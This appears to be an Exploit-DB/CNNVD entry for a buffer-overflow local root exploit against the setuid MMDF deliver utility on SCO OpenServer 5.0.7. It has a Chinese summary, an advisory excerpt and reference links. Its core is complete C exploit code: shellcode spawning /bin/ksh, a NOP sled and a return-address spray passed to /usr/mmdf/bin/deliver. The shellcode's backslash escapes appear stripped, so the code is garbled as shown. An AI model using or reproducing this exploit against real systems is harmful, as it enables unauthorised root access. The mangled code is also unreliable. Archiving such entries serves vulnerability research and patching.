https://www.exploit-db.com/exploits/24293
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-090

OpenServer是一款由Caldera维护的商业性质Unix类型操作系统。OpenServer的MMDF包中execmail存在缓冲区溢出，本地攻击者可以利用这个漏洞进行缓冲区溢出攻击，提升权限。另外MMDF存在NULL指针废弃和CoreDump问题，可导致应用程序崩溃，

/*
source: http://www.securityfocus.com/bid/10758/info

It has been reported that the SCO Multi-channel Memorandum Distribution Facility (MMDF) is affected by multiple vulnerabilities. These issues are due to a failure of the utility to properly validate buffer boundaries when copying user-supplied input.

These issues are known to be exploitable locally, however due to the nature of the application it is likely that remote exploitation is possible as well, although this is not confirmed.

An attacker might leverage these issues to execute arbitrary code in the context of the vulnerable utility; many of the affected utilities are setuid binaries by default. These issues might also be leveraged to cause the affected utility to crash, denying service to legitimate users.
*/

/*
 *  MMDF deliver local root exploit for SCO OpenServer 5.0.7 x86
 *  Copyright 2004 Ramon de Carvalho Valle
 *
 */

char shellcode[]=           /*  36 bytes                          */
    "x68xffxf8xffx3c"  /*  pushl   $0x3cfff8ff               */
    "x6ax65"              /*  pushl   $0x65                     */
    "x89xe6"              /*  movl    %esp,%esi                 */
    "xf7x56x04"          /*  notl    0x04(%esi)                */
    "xf6x16"              /*  notb    (%esi)                    */
    "x31xc0"              /*  xorl    %eax,%eax                 */
    "x50"                  /*  pushl   %eax                      */
    "x68""/ksh"            /*  pushl   $0x68736b2f               */
    "x68""/bin"            /*  pushl   $0x6e69622f               */
    "x89xe3"              /*  movl    %esp,%ebx                 */
    "x50"                  /*  pushl   %eax                      */
    "x50"                  /*  pushl   %eax                      */
    "x53"                  /*  pushl   %ebx                      */
    "xb0x3b"              /*  movb    $0x3b,%al                 */
    "xffxd6"              /*  call    *%esi                     */
;

main(int argc,char **argv) {
    char buffer[16384],address[4],*p;
    int i;

    printf("MMDF deliver local root exploit for SCO OpenServer 5.0.7 x86n");
    printf("Copyright 2004 Ramon de Carvalho Vallenn");

    *((unsigned long *)address)=(unsigned long)buffer-256+5120+4097;

    sprintf(buffer,"-c");
    p=buffer+2;
    for(i=0;i<5120;i++) *p++=address[i%4];
    for(i=0;i<8192;i++) *p++=0x90;
    for(i=0;i<strlen(shellcode);i++) *p++=shellcode[i];
    *p=0;

    execl("/usr/mmdf/bin/deliver","deliver",buffer,0);
}

来源:XF
名称:openserver-mmdf-name-dos(16739)
链接:http://xforce.iss.net/xforce/xfdb/16739
来源:BID
名称:10758
链接:http://www.securityfocus.com/bid/10758
来源:SCO
名称:SCOSA-2004.7
链接:ftp://ftp.sco.com/pub/updates/OpenServer/SCOSA-2004.7/SCOSA-2004.7.txt